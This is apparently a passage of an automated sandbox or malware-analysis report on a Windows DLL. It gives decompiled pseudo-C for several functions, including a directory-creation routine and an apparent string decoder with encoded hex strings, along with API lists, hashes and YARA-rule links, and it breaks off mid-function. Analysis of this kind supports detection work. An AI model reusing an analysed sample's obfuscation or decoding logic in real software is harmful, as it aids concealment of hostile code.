                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 307345228-0
                                                                                                                                                  • Opcode ID: 3fa080792e8f122ef4bd9e82f814b767f584e1b675a71d5f0840865282362c8a
                                                                                                                                                  • Instruction ID: 6d666b1b705590ba96f1ceb0353b4b15af4abd34259d4ff25040d8c508a7a09c
                                                                                                                                                  • Opcode Fuzzy Hash: 3fa080792e8f122ef4bd9e82f814b767f584e1b675a71d5f0840865282362c8a
                                                                                                                                                  • Instruction Fuzzy Hash: 103190B2704B848ADB049F29D95068A73E5FB4DBE8F484725EE2D477D8DF79D0418300
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677066C0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 75stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E677066C0(void* __edi, void* __esi, void* __ebp, void* __esp, long long __rbx, void* __rcx, long long __rdx, long long __rsi, void* __rbp) {
				void* _v8;
				signed int _v24;
				char _v104;
				int _t22;
				void* _t25;
				void* _t36;
				void* _t42;
				signed long long _t48;
				long long _t50;
				long long _t76;
				long long _t81;
				void* _t82;
				void* _t84;
				void* _t90;

				_t90 = _t84;
				 *((long long*)(_t90 + 0x18)) = __rbx;
				 *((long long*)(_t90 + 0x20)) = __rsi;
				_t85 = _t84 - 0x90;
				_t48 =  *0x67716000; // 0x9b7b11e8241
				_v24 = _t48 ^ _t84 - 0x00000090;
				if(__rcx != 0 && __rdx != 0) {
					_t50 = "\":\"";
					 *((long long*)(_t90 - 0x70)) = _t50;
					 *((long long*)(_t90 - 0x78)) = __rdx;
					_t22 = E67707758(E67706F38(__rdx, "%s%s%s", "\""), __rcx,  &_v104);
					_t81 = _t50;
					if(_t50 != 0) {
						_t82 = _t81 + lstrlenA();
						_t25 = memset(__edi, 0, _t32 << 0);
						_t42 = __esp + 0xc;
						_t36 = __edi + _t32;
						_t32 = 0;
						E67707758(_t25, _t82, "\"");
						_t76 = _t50;
						if(_t50 == 0 || _t50 <= _t82) {
							goto L7;
						} else {
							_t13 = _t76 + 1; // 0x1
							_t32 = _t13;
							malloc(??);
							 *((char*)(_t36 - __esi + _t50)) = 0;
							E6770ED80(_t13, _t50, _t82, _t36 - __esi);
							E67705CC4(_t13, __ebp, _t42, _t50, _t50, _t50, _t82, __rbp, _t36 - __esi);
							free(??);
						}
					} else {
						memset(__edi, _t22, 0x4b << 0);
						_t32 = 0;
					}
				}
				return E67706F80(_t32, _v24 ^ _t85);
			}

















                                                                                                                                                  0x677066c0
                                                                                                                                                  0x677066c3
                                                                                                                                                  0x677066c7
                                                                                                                                                  0x677066cc
                                                                                                                                                  0x677066d3
                                                                                                                                                  0x677066dd
                                                                                                                                                  0x677066eb
                                                                                                                                                  0x677066fa
                                                                                                                                                  0x6770670d
                                                                                                                                                  0x67706711
                                                                                                                                                  0x6770672f
                                                                                                                                                  0x67706734
                                                                                                                                                  0x6770673a
                                                                                                                                                  0x67706763
                                                                                                                                                  0x67706769
                                                                                                                                                  0x67706769
                                                                                                                                                  0x67706769
                                                                                                                                                  0x67706769
                                                                                                                                                  0x6770676e
                                                                                                                                                  0x67706773
                                                                                                                                                  0x67706779
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706780
                                                                                                                                                  0x67706782
                                                                                                                                                  0x67706782
                                                                                                                                                  0x67706788
                                                                                                                                                  0x67706799
                                                                                                                                                  0x6770679e
                                                                                                                                                  0x677067a6
                                                                                                                                                  0x677067b1
                                                                                                                                                  0x677067b6
                                                                                                                                                  0x6770673c
                                                                                                                                                  0x67706743
                                                                                                                                                  0x67706743
                                                                                                                                                  0x67706743
                                                                                                                                                  0x6770673a
                                                                                                                                                  0x677067e1

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcsftime_lfreelstrlenmalloc
                                                                                                                                                  • String ID: ":"$%s%s%s
                                                                                                                                                  • API String ID: 2024114624-2586574477
                                                                                                                                                  • Opcode ID: e86c31f89ddf376de939e9b0af9c83ef1f35ef0a0b8a9657722a3c89bed2e81e
                                                                                                                                                  • Instruction ID: cc098c0a3d251993bba1005c0425bbe4b593378ac9bfe42422bb65e1e9ac75b4
                                                                                                                                                  • Opcode Fuzzy Hash: e86c31f89ddf376de939e9b0af9c83ef1f35ef0a0b8a9657722a3c89bed2e81e
                                                                                                                                                  • Instruction Fuzzy Hash: 0F21A9B1319B8085EE14CB21EA6876963E6BB4CBC8FC56435DE5D87708EF39C65AC300
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770D2F0, Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,6770D405,?,?,?,?,67708792,?,?,?,67708151), ref: 6770D319
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,6770D405,?,?,?,?,67708792,?,?,?,67708151), ref: 6770D329
                                                                                                                                                    • Part of subcall function 6770FA34: _errno.LIBCMT ref: 6770FA3D
                                                                                                                                                    • Part of subcall function 6770FA34: _invalid_parameter_noinfo.LIBCMT ref: 6770FA48
                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,6770D405,?,?,?,?,67708792,?,?,?,67708151), ref: 6770D3A7
                                                                                                                                                    • Part of subcall function 6770C1D0: realloc.LIBCMT ref: 6770C1FB
                                                                                                                                                    • Part of subcall function 6770C1D0: Sleep.KERNEL32(?,?,00000000,6770D397,?,?,?,6770D405,?,?,?,?,67708792), ref: 6770C217
                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,6770D405,?,?,?,?,67708792,?,?,?,67708151), ref: 6770D3B7
                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,6770D405,?,?,?,?,67708792,?,?,?,67708151), ref: 6770D3C4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1909145217-0
                                                                                                                                                  • Opcode ID: 839815cc5db0813cbbeeead295b238cf85d501b81c36b6ce2285bb86f3fb0801
                                                                                                                                                  • Instruction ID: fd2361bd3aa4747fd519f555ac29546079a52b9cd402ea5163e80c971a540331
                                                                                                                                                  • Opcode Fuzzy Hash: 839815cc5db0813cbbeeead295b238cf85d501b81c36b6ce2285bb86f3fb0801
                                                                                                                                                  • Instruction Fuzzy Hash: 22215CA131AB84C1DB00DB11FA58349B3E2B75DBD9F984825CE0D4B724EFB8C095C745
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677069A8, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 62stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E677069A8(long long __rbx, intOrPtr* __rcx, signed int __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				signed int _t30;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char* _t55;
				signed char* _t60;
				signed char* _t71;
				void* _t74;
				void* _t78;
				signed char* _t79;

				_t78 = __r8;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if(__rcx == 0 ||  *__rcx < 0xc) {
					_t30 = 0;
				} else {
					_t55 =  *((intOrPtr*)(__rcx + 8));
					malloc(??);
					_t74 = ( *_t55 & 0x000000ff) - __rdx + __rdx * 2 + 9;
					_t55[_t74] = 0;
					_t71 = _t55;
					E67701000(__rbx, "b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a2a9f5b1791ddcacde6f5", __rdx, __r8);
					_t60 = _t55;
					_t39 = lstrlenA(??);
					_t79 =  *((intOrPtr*)(__rcx + 8));
					r8d = 1;
					_t14 = _t55 - 0xa; // -9
					_t45 = _t14;
					r11d = _t39;
					_t40 =  *_t79 & 0x000000ff;
					asm("cdq");
					_t30 = _t40 / _t45;
					 *_t71 = _t60[_t40 % _t45];
					while(_t78 < _t74) {
						_t41 = _t79[_t78] & 0x000000ff;
						asm("cdq");
						_t30 = _t41 / r11d;
						 *((char*)(_t78 + _t71)) = _t60[_t41 % r11d];
						_t78 = _t78 + 1;
					}
					free();
				}
				return _t30;
			}














                                                                                                                                                  0x677069a8
                                                                                                                                                  0x677069a8
                                                                                                                                                  0x677069ad
                                                                                                                                                  0x677069b2
                                                                                                                                                  0x677069c2
                                                                                                                                                  0x67706a64
                                                                                                                                                  0x677069d1
                                                                                                                                                  0x677069d1
                                                                                                                                                  0x677069f4
                                                                                                                                                  0x677069f9
                                                                                                                                                  0x67706a03
                                                                                                                                                  0x67706a07
                                                                                                                                                  0x67706a0a
                                                                                                                                                  0x67706a12
                                                                                                                                                  0x67706a15
                                                                                                                                                  0x67706a1b
                                                                                                                                                  0x67706a1f
                                                                                                                                                  0x67706a25
                                                                                                                                                  0x67706a25
                                                                                                                                                  0x67706a28
                                                                                                                                                  0x67706a2b
                                                                                                                                                  0x67706a2f
                                                                                                                                                  0x67706a30
                                                                                                                                                  0x67706a38
                                                                                                                                                  0x67706a52
                                                                                                                                                  0x67706a3c
                                                                                                                                                  0x67706a41
                                                                                                                                                  0x67706a42
                                                                                                                                                  0x67706a4b
                                                                                                                                                  0x67706a4f
                                                                                                                                                  0x67706a4f
                                                                                                                                                  0x67706a5a
                                                                                                                                                  0x67706a5f
                                                                                                                                                  0x67706a7a

                                                                                                                                                  APIs
                                                                                                                                                  • malloc.LIBCMT ref: 677069F4
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,67706AFE), ref: 67706A15
                                                                                                                                                  • free.LIBCMT ref: 67706A5A
                                                                                                                                                  Strings
                                                                                                                                                  • VUUU, xrefs: 677069D8
                                                                                                                                                  • b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a2a9f5b1791ddcacde6f5, xrefs: 677069FC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errnomalloc$AllocateHeap_callnewhfreelstrlen
                                                                                                                                                  • String ID: VUUU$b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a2a9f5b1791ddcacde6f5
                                                                                                                                                  • API String ID: 1547360710-2522500852
                                                                                                                                                  • Opcode ID: d402e98033d10aaededf0e299bed9c3d4a871f81c62e4b8cfd7490a122138d89
                                                                                                                                                  • Instruction ID: 2dcb035d03107ba30266e47494f976a5e22f0f1325587e776f3e1e90c254ee5b
                                                                                                                                                  • Opcode Fuzzy Hash: d402e98033d10aaededf0e299bed9c3d4a871f81c62e4b8cfd7490a122138d89
                                                                                                                                                  • Instruction Fuzzy Hash: 3911D6A6209BC18AC705CF6AE5A035D7BE1E74DFC4F489131EB89C7715EA2DC295C740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67706E2C, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E67706E2C(void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a16, long long _a24, long long _a32) {
				void* _v8;
				signed int _v24;
				intOrPtr _v82;
				char _v83;
				char _v88;
				void* _t19;
				signed int _t29;
				void* _t31;
				signed long long _t40;
				signed long long _t41;
				signed long long _t45;
				signed long long _t59;
				void* _t63;
				void* _t65;

				_t68 = __r8;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t66 = _t65 - 0x70;
				_t40 =  *0x67716000; // 0x9b7b11e8241
				_t41 = _t40 ^ _t65 - 0x00000070;
				_v24 = _t41;
				_t63 = __rcx;
				_t19 = E67701000(__rbx, "a454768eb985ba91", __rdx, __r8);
				_t57 = _t41;
				_t59 = _t41;
				E67707758(_t19, __rcx, _t41);
				_t43 = _t41;
				free(??);
				if(_t41 == __rcx) {
					E67701000(_t43, "a438456a6d39", _t57, _t68);
					_t45 = _t41;
					E67707984(0x39, _t41,  &_v88, _t57, _t41);
					free(??);
					if(_v82 != 0 || _v83 != 0x20) {
						goto L9;
					} else {
						sil = 0;
						_t8 = _t45 + 7; // 0x7
						_t31 = _t8;
						while(1) {
							_t9 = _t59 + 0x30; // 0x37
							_v83 = _t9;
							E67707758(_t9, _t63,  &_v88);
							if(_t41 != 0) {
								break;
							}
							_t31 = _t31 - 1;
							if(_t31 >= 2) {
								continue;
							} else {
							}
							L8:
							goto L10;
						}
						sil = 1;
						goto L8;
					}
				}
				L10:
				return E67706F80(_t29, _v24 ^ _t66);
			}

















                                                                                                                                                  0x67706e2c
                                                                                                                                                  0x67706e2c
                                                                                                                                                  0x67706e31
                                                                                                                                                  0x67706e36
                                                                                                                                                  0x67706e3c
                                                                                                                                                  0x67706e40
                                                                                                                                                  0x67706e47
                                                                                                                                                  0x67706e4a
                                                                                                                                                  0x67706e4f
                                                                                                                                                  0x67706e59
                                                                                                                                                  0x67706e61
                                                                                                                                                  0x67706e64
                                                                                                                                                  0x67706e67
                                                                                                                                                  0x67706e6f
                                                                                                                                                  0x67706e72
                                                                                                                                                  0x67706e7a
                                                                                                                                                  0x67706e83
                                                                                                                                                  0x67706e95
                                                                                                                                                  0x67706e98
                                                                                                                                                  0x67706ea0
                                                                                                                                                  0x67706eab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706eb4
                                                                                                                                                  0x67706eb4
                                                                                                                                                  0x67706eb7
                                                                                                                                                  0x67706eb7
                                                                                                                                                  0x67706eba
                                                                                                                                                  0x67706eba
                                                                                                                                                  0x67706ec5
                                                                                                                                                  0x67706ec9
                                                                                                                                                  0x67706ed1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706ed3
                                                                                                                                                  0x67706ed8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706eda
                                                                                                                                                  0x67706edf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706ee2
                                                                                                                                                  0x67706edc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706edc
                                                                                                                                                  0x67706eab
                                                                                                                                                  0x67706ee9
                                                                                                                                                  0x67706f0b

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  • free.LIBCMT ref: 67706E72
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                    • Part of subcall function 67701000: rand.LIBCMT ref: 677010D6
                                                                                                                                                    • Part of subcall function 67707984: _errno.LIBCMT ref: 6770799C
                                                                                                                                                    • Part of subcall function 67707984: _invalid_parameter_noinfo.LIBCMT ref: 677079A8
                                                                                                                                                  • free.LIBCMT ref: 67706EA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errnofree$ErrorFreeHeapLast_invalid_parameter_noinfomallocrand
                                                                                                                                                  • String ID: $a438456a6d39$a454768eb985ba91
                                                                                                                                                  • API String ID: 3800333333-549952436
                                                                                                                                                  • Opcode ID: d994ea10893ba63bb7bbb2934dd503952d33b5274d9c67197294b67bcc32dc43
                                                                                                                                                  • Instruction ID: 4c53fe2df4be35289d4d21d806e44c73af4a2fce4c6b1f86a8e2a24ca3803c76
                                                                                                                                                  • Opcode Fuzzy Hash: d994ea10893ba63bb7bbb2934dd503952d33b5274d9c67197294b67bcc32dc43
                                                                                                                                                  • Instruction Fuzzy Hash: D5119DA220878499DE10DB21E66834A63E5F78DBCCF880126DA8D87709EF39D685C741
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703EF8, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                  			E67703EF8(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed long long __r8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v600;
				void* _t17;
				void* _t18;
				signed char _t22;
				signed char _t23;
				signed int _t28;
				signed long long _t36;
				signed long long _t37;
				void* _t39;
				signed long long _t54;
				void* _t57;
				signed long long _t60;

				_t60 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_t58 = _t57 - 0x270;
				_t36 =  *0x67716000; // 0x9b7b11e8241
				_t37 = _t36 ^ _t57 - 0x00000270;
				_v24 = _t37;
				_t39 = __rcx;
				if(__rcx != 0) {
					_t52 = "\\";
					_t18 = E67707920(_t17, __rcx, "\\");
					while(1) {
						_t54 = _t37;
						if(_t37 == 0) {
							break;
						}
						r8d = 0x23a;
						E67709420(_t18, _t28, 0,  &_v600, _t52, _t60);
						_t60 = _t54 - _t39 >> 1;
						r8d = r8d + 1;
						lstrcpynW(??, ??, ??);
						CreateDirectoryW(??, ??);
						_t22 = GetFileAttributesW(??);
						if(_t22 != 0xffffffff && (_t22 & 0x00000010) != 0) {
							_t10 = _t54 + 2; // 0x2
							_t52 = "\\";
							_t18 = E67707920(_t22, _t10, "\\");
							continue;
						}
						L8:
						_t23 = GetFileAttributesW();
						if(_t23 == 0xffffffff || (_t23 & 0x00000010) == 0) {
							sil = 0;
						}
						goto L12;
					}
					CreateDirectoryW();
					goto L8;
				} else {
				}
				L12:
				return E67706F80(_t28, _v24 ^ _t58);
			}

















                                                                                                                                                  0x67703ef8
                                                                                                                                                  0x67703ef8
                                                                                                                                                  0x67703efd
                                                                                                                                                  0x67703f03
                                                                                                                                                  0x67703f0a
                                                                                                                                                  0x67703f11
                                                                                                                                                  0x67703f14
                                                                                                                                                  0x67703f1c
                                                                                                                                                  0x67703f22
                                                                                                                                                  0x67703f2b
                                                                                                                                                  0x67703f32
                                                                                                                                                  0x67703f9b
                                                                                                                                                  0x67703f9b
                                                                                                                                                  0x67703fa1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703f45
                                                                                                                                                  0x67703f4b
                                                                                                                                                  0x67703f5e
                                                                                                                                                  0x67703f61
                                                                                                                                                  0x67703f64
                                                                                                                                                  0x67703f71
                                                                                                                                                  0x67703f7c
                                                                                                                                                  0x67703f85
                                                                                                                                                  0x67703f8b
                                                                                                                                                  0x67703f8f
                                                                                                                                                  0x67703f96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703f96
                                                                                                                                                  0x67703fae
                                                                                                                                                  0x67703fb1
                                                                                                                                                  0x67703fba
                                                                                                                                                  0x67703fc0
                                                                                                                                                  0x67703fc0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703fc3
                                                                                                                                                  0x67703fa8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703f24
                                                                                                                                                  0x67703f24
                                                                                                                                                  0x67703fc6
                                                                                                                                                  0x67703fea

                                                                                                                                                  APIs
                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 67703FA8
                                                                                                                                                  • GetFileAttributesW.KERNEL32 ref: 67703FB1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3401506121-0
                                                                                                                                                  • Opcode ID: f70022a6f394d87250de60b1db810086f801f225f69d237de28c2cae7b959311
                                                                                                                                                  • Instruction ID: 5dcc48cfe1ce9f601fd1072bf07393c7f62eb43c87237ac898f7bb40fc8f4478
                                                                                                                                                  • Opcode Fuzzy Hash: f70022a6f394d87250de60b1db810086f801f225f69d237de28c2cae7b959311
                                                                                                                                                  • Instruction Fuzzy Hash: BA21047121CA4085EE10CB35E94879AA3B2FB9D7C8FC85A35C99E43294EF3DC60AC740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770275C, Relevance: 7.5, APIs: 5, Instructions: 46fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseHandle$CreateWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3372599229-0
                                                                                                                                                  • Opcode ID: 4825ebec10b1f778fd5226af9d0b90ad1528da38efe5ca52fc98bed94752e625
                                                                                                                                                  • Instruction ID: 1f0b5ef5066d8b8057e631ccce42c698d0ee298218b6f19b0d342054d2992a43
                                                                                                                                                  • Opcode Fuzzy Hash: 4825ebec10b1f778fd5226af9d0b90ad1528da38efe5ca52fc98bed94752e625
                                                                                                                                                  • Instruction Fuzzy Hash: BE11C4B631864087FB04CB25EA18319B3A0FB5CBE8F449A348F294B794DF79C464C700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770FB28, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6770FB28(signed int __ecx, void* __edx, signed int* __rax) {
				void* _t8;
				void* _t11;
				signed int* _t18;

				_t18 = __rax;
				if(__ecx != 0xfffffffe) {
					if(__ecx < 0 || __ecx >=  *0x677198e8) {
						L6:
						E6770853C(_t18);
						 *_t18 =  *_t18 & 0x00000000;
						E6770851C(_t18);
						 *_t18 = 9;
						_t11 = E67709254();
						L7:
						return _t11;
					} else {
						_t18 =  *((intOrPtr*)(0x67719900 + (__ecx >> 5) * 8));
						if(( *(_t18 + 8 + __ecx * 0x58) & 0x00000001) == 0) {
							goto L6;
						}
						return _t8;
					}
				}
				E6770853C(__rax);
				 *__rax =  *__rax & 0x00000000;
				_t11 = E6770851C(__rax);
				 *__rax = 9;
				goto L7;
			}






                                                                                                                                                  0x6770fb28
                                                                                                                                                  0x6770fb2f
                                                                                                                                                  0x6770fb48
                                                                                                                                                  0x6770fb7b
                                                                                                                                                  0x6770fb7b
                                                                                                                                                  0x6770fb80
                                                                                                                                                  0x6770fb83
                                                                                                                                                  0x6770fb88
                                                                                                                                                  0x6770fb8e
                                                                                                                                                  0x6770fb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770fb52
                                                                                                                                                  0x6770fb6a
                                                                                                                                                  0x6770fb73
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770fb75
                                                                                                                                                  0x6770fb48
                                                                                                                                                  0x6770fb31
                                                                                                                                                  0x6770fb36
                                                                                                                                                  0x6770fb39
                                                                                                                                                  0x6770fb3e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                  • Opcode ID: 458f91525552f35d452806164ca19c5e77d6e00cbc9474c3ad0eded840234c68
                                                                                                                                                  • Instruction ID: b604434b5b00b134d286e666cc9ba83f6f5bd9d473b88d07bca3093fa53771ed
                                                                                                                                                  • Opcode Fuzzy Hash: 458f91525552f35d452806164ca19c5e77d6e00cbc9474c3ad0eded840234c68
                                                                                                                                                  • Instruction Fuzzy Hash: D4F0CDF2318B4481DB055B28CAE031C76E19BEAB79F998310C639063E4C73C88558F16
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677071D8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                  			E677071D8(void* __ecx, intOrPtr* __rax, long long __rbx, long long* __rcx, long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, void* _a40, void* _a48) {
				void* _v24;
				intOrPtr _v48;
				long long _v56;
				char _v64;
				void* _v72;
				void* __rbp;
				void* _t28;
				signed int _t32;
				signed int _t42;
				signed int _t43;
				intOrPtr* _t45;
				long long _t47;
				void* _t56;
				long long _t59;
				long long _t61;
				long long _t62;
				void* _t70;
				long long* _t71;

				_t47 = __rbx;
				_t45 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t61 = _t62;
				_t70 = __r8;
				_t71 = __rcx;
				_t59 = __rdx;
				_t5 = _t47 + 0x28; // 0x28
				r8d = _t5;
				_t56 = __r9;
				_v72 = __rbx;
				E67709420(_t28, __ecx, 0,  &_v64, __rdx, __r8);
				if(_t56 != 0) {
					if(__r8 == 0 || __rdx != 0) {
						_t31 =  >  ? 0x7fffffff : r12d;
						_v48 = 0x42;
